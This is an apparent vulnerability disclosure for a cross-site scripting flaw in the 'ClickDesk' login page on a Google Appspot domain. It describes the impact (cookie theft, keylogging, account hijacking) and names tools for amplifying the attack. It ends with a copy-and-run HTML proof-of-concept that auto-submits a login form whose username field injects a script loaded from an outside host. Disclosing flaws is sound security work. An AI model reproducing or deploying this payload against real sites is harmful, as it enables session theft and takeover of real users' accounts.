The Google Appspot "ClickDesk" login page is vulnerable to Cross Site Scripting attack. Cross Site scripting attack is a critical issue in web application. When an attacker gets a user's browser to execute his/her XSS code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read (keylogging), modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting.
The vulnerability can easily be amplified by publicly available tools like Cross Site Scripting framework (XSSF), Cross Site Scripting harvest perl (XSS-Harvest) and so on.
Proof of concept:
The following proof-of concept sample will do a HTTP POST to trigger the XSS vulnerability from "XSS cheatsheet from ha.ckers.org" site. In real hacking situation, the injection source url will be hosted on some compromised web servers.
Copy the following code and save it as any .htm or html filename. Open it any browser to trigger it automatically.
*********
<script>document.body.innerHTML += '<form id="a" action="https://contactuswidget.appspot.com/login.jsp?domain=lc" method="post"><input type="hidden" name="command" value="login"><input type="hidden" id="username" name="username" value="<script src=http:\/\/ha.ckers.org\/xss.jpg><\/script>"><input type="hidden" id="password" name="password" value="aaaa"></form>';document.getElementById("a").submit();</script>
*********
